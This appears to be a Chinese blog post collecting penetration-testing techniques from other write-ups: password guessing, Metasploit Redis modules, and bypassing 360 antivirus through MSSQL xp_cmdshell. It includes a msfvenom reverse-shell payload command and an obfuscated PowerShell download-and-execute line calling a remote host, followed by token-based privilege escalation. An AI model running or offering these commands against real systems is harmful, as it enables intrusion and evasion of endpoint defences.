渗透测试文章中的思路收集(长期更新)

记录各种文章渗透测试思路以及难点突破

说在前面

2020年7月2日,坐标深圳,天气晴。突然感觉自己好菜。

突发奇想从现在开始把各位师傅文章中的一些思路的点给记下来,集成成一篇文章。还是蛮有意思的。

弱口令 + redis未授权

原文链接:实战|记一次授权的渗透测试

渗透难点:登录框
文章思路:

  1. 验证码可复用 + 密码可爆破 (缺陷:大量日志)
  2. 站点为 ip + port , fofa探测端口。

使用 fofa 简单探测了下端口,发现这个 ip 开放了很多端口,如 3306,27017,6379,22 等等。这里简单思考了一下,能利用的端口有 mysql,redis,mongodb,ssh 还有一些 http 服务,这其中 mysql 版本为 8.0.17,在这个版本,漏洞多多少少都修复的差不多了,接下来尝试 mongodb 未授权漏洞,不出所料,漏洞修复了;再尝试弱口令连接,也不存在~~,之后经过其它的信息收集手法,暂时对目标业务信息有了一个比较简单的认知,随后还是回到 http 服务,尝试从 web 端入手

渗透难点:端口漏洞难以利用
文章思路:

  1. 回到登陆框,核心突破思路:“这个项目的运维特喜欢使用站点名称加年份的组合口令;根据这个有用信息,结合以前收集到的历史账号密码和目标站点的有用信息来生成一个小组合口令字典”

渗透难点:上传文件路径404
文章思路:

  1. 回顾6379端口,msf 枚举 redis 密码

姿势学习:

# msf模块
auxiliary/scanner/redis/file_upload #此模块功能为上传本地的文件到目标服务器。

auxiliary/scanner/redis/redis_login #此模块功能是对 redis 的密码进行枚举,亲测速度很快。

auxiliary/scanner/redis/redis_server #此模块功能是验证枚举或者其他手段得到的 redis 密码是否正确,该功能会执行一个 info 命令并返回执行结果

浅析图形验证码安全:https://xz.aliyun.com/t/4984

MSSQL绕过360提权

原文链接: MSSQL绕过360提权实战案例

前期渗透思路: 在以前服务器上找到了SA密码 ——> 直接远程连接 ——> 支持 xp_cmdshell 执行命令

特殊说明: 未做站库分离处理

权限与杀软:
当前权限:nt service\mssqlserver
进程名称:ZhuDongFangYu.exe(360主动防御)

渗透难点:项目站点放在C盘,无权限查看C盘目录下文件。只能看D盘路径文件

文中思路:

而我的思路就是直接利用MSF的web_delivery或hta_server模块来获取一个Meterpreter会话,然后再进行权限提升即可。但是在测试过程中也遇到一点小问题,web_delivery执行时出现“标识符太长”的报错,hta_server执行底层powershell.exe时被360的进程防护给拦截了。
这里我们重新生成一个psh-reflection格式的Payload,然后再用xp_cmdshell来执行经过混淆后的Powershell远程执行ps1脚本命令,可以看到已经成功获取到目标机器会话了,其实这也就是这篇文章中主要讲的利用Powershell命令混淆来绕过360进程防护拦截。

msf:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=39.**.**.238 LPORT=443 -f psh-reflection > /tmp/360.ps1

xp_cmdshell:

exec master.dbo.xp_cmdshell "powershell $a='IEX((new-object net.webclient).downloadstring(''ht';$b='tp://39.**.**.238:8888/360.ps1''))';IEX ($a+$b)"

final:
获取到会话后可直接使用Incognito扩展来进行权限提升,因为目标机器上有在运行navicat.exe数据库连接工具,并以Windows身份验证的方式连接的MSSQL,所以会拥有高权限令牌。

网鼎杯线下半决赛 faka 题目复盘
Your browser is out-of-date!

Update your browser to view this website correctly. Update my browser now

×